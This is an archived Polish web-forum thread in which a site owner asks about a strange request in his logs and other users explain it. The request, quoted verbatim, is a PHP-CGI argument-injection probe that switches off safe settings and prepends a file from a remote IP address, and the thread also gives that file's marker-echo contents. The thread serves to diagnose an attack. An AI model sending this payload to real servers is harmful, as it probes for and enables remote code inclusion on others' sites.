Witam
Zauważyłem że ktoś odwiedza moją stronę z takimi parametrami zawartymi w linku:
/index.php?-dsafe_mode?Off+-ddisable_functions?NULL+-dallow_url_fopen?On+-dallow_url_include?On+-dauto_prepend_file?http://178.63.8.214/echo.txt
Czy ktoś może mi pomóc rozszyfrować o co chodzi?
Prawdopodobnie próbuje obejść zabezpieczenia i włączyć otwieranie plików przez url.
Nie wiem tylko czemu służy ten plik echo.txt, w którym jest kawałek kodu php:
<?php echo "dsfer34w5rlsidfosdedfpsd";?>
Może ktoś już miał z tym styczność i wie co kryje się za magicznym ciągiem znaków: dsfer34w5rlsidfosdedfpsd
Będę wdzięczny za pomoc, pozdrawiam:)
Pełna wersja: Dziwne parametry w linku
Atakujący próbuje dołączyć plik echo.txt. Jeśli mu się uda, na stronie pojawi się tekst wyświetlany przez funkcje echo. Na tej podstawie będzie wiedział czy strona jest podatna na ataki.
Cytat(webdice @ 17.11.2012, 00:12:39 ) 
Atakujący próbuje dołączyć plik echo.txt. Jeśli mu się uda, na stronie pojawi się tekst wyświetlany przez funkcje echo. Na tej podstawie będzie wiedział czy strona jest podatna na ataki.
Dzięki:)
Czyli ciąg: dsfer34w5rlsidfosdedfpsd jest po prostu elementem unikalnym, który na pewno nigdzie na stronie się nie pojawia i będzie wiedział, że udało mu się coś dołączyć do strony skanując jej źródło
Cytat(andrew654 @ 17.11.2012, 08:57:41 )
(...) który na pewno nigdzie na stronie się nie pojawia i będzie wiedział, że udało mu się coś dołączyć do strony skanując jej źródło
Możesz go sobie szukać w źródle i go nie znajdziesz. Ten ciąg pojawi się (tylko w tym jednym żądaniu) wtedy gdy ktoś odwiedzi stronę z takimi parametrami, a strona jest podatna na tego typu atak (oczywiście jest to też kwestia konfiguracji serwera).
To nie tak że jak nie znajdziesz tego ciągu w źródle strony to jesteś bezpieczny.
To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę kliknij tutaj.